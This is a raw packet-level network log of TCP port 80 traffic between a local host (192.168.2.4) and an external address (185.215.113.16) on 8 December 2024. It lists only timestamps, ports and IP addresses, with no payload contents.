Dec 8, 2024 19:52:39.326272964 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.326936960 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.326984882 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.327070951 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.327128887 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.327869892 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.327912092 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.327918053 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.327953100 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.328805923 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.328849077 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.329044104 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.329090118 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.329735041 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.329782009 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.329900980 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.329947948 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.330642939 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.330689907 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.330754995 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.330800056 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.331783056 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.331825972 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.331934929 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.332005024 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.332624912 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.332676888 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.332792997 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.332838058 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.333406925 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.333452940 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.333597898 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.333642006 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.334285975 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.334333897 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.334407091 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.334455013 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.335299015 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.335341930 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.335505009 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.335551023 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.336203098 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.336265087 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.336606979 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.336684942 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.337079048 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.337121010 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.337193966 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.337234020 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.338012934 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.338058949 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.338123083 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.338165998 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.338938951 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.338984013 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.339119911 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.339162111 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.339853048 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.339895964 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.339962006 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.340003967 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.340812922 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.340857029 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.340956926 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.341001034 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.341684103 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.341728926 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.341864109 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.341906071 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.342613935 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.342658997 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.342771053 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.342814922 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.343528032 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.343570948 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.343718052 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.343765020 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.344432116 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.344471931 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.344573975 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.344619036 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.345361948 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.345403910 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.345463037 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.345504999 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.346307993 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.346352100 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.346410990 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.346452951 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.347266912 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.347316980 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.347434998 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.347475052 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.348156929 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.348202944 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.348304033 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.348347902 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.349176884 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.349224091 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.349251032 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.349287987 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.350279093 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.350322962 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.350344896 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.350379944 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.351284981 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.351330996 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.351389885 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.351433992 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.352222919 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.352274895 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.352287054 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.352324963 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.353037119 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.353079081 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.353157043 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.353199005 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.353950977 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.354001999 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.354058027 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.354096889 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.354787111 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.354831934 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.354882956 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.354924917 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.355504036 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.355546951 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.355603933 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.355642080 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.356424093 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.356467009 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.356542110 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.356585026 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.357331991 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.357382059 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.357431889 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.357476950 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.358273983 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.358321905 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.358356953 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.358392954 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.359324932 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.359371901 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.359428883 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.359468937 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.360161066 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.360218048 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.360236883 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.360272884 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.361135006 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.361186981 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.361366034 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.361411095 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.362122059 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.362185955 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.362210035 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.362246037 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.362946987 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.363012075 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.363090038 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.363131046 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.364135981 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.364186049 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.364259958 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.364305973 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.365022898 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.365068913 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.365444899 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.365489960 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.365866899 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.365910053 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.365952015 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.365992069 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.366601944 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.366662025 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.366695881 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.366739988 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.367594957 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.367646933 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.367716074 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.367760897 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.368474007 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.368520975 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.368545055 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.368587017 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.513109922 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.513125896 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.513170004 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.513189077 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.513318062 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.513355970 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.513545036 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.513597965 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.513664961 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.513705969 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.514303923 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.514353991 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.514377117 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.514420033 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.515182018 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.515232086 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.515289068 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.515331984 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.516100883 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.516149998 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.516431093 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.516475916 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.516477108 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.516514063 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.517317057 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.517362118 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.517400026 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.517445087 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.518388033 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.518431902 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.518441916 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.518480062 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.519176006 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.519200087 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.519253969 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.520282030 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.520334005 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.520406961 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.520447016 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.521040916 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.521086931 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.521112919 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.521153927 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.522008896 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.522058964 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.522162914 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.522206068 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.522945881 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.522991896 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.522991896 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.523034096 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.523844957 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.523893118 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.523926020 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.523969889 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.524697065 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.524739981 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.524806976 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.524853945 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.525896072 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.525940895 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.526063919 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.526108980 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.526828051 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.526870966 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.526896954 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.526935101 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.527693987 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.527736902 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.527765036 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.527801037 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.528489113 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.528532028 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.528618097 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.528664112 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.529340029 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.529383898 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.529460907 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.529505968 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.530227900 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.530277014 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.530297995 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.530339956 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.531162977 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.531208992 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.531243086 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.531281948 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.532082081 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.532126904 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.532183886 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.532227039 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.533057928 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.533076048 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.533096075 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.533117056 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.533951044 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.533997059 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.534038067 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.534080982 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.535041094 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.535053015 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.535094976 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.535808086 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.535862923 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.535995007 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.536037922 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.536750078 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.536812067 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.536834002 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.536875010 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.537647963 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.537695885 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.537724018 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.537771940 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.538549900 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.538597107 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.538669109 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.538711071 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.539534092 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.539582968 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.539614916 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.539659977 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.540417910 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.540465117 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.540525913 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.540570974 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.541337967 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.541382074 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.541702032 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.541749954 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.542248011 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.542295933 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.542334080 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.542375088 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.543216944 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.543262959 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.543329000 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.543373108 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.561429024 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.561490059 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.561505079 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.561546087 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.561569929 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.561579943 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.561641932 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.561681986 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.561702013 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.561713934 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.561741114 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.561763048 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.561844110 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.561855078 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.561866045 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.561888933 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.561902046 CET	49757	80	192.168.2.4	185.215.113.16
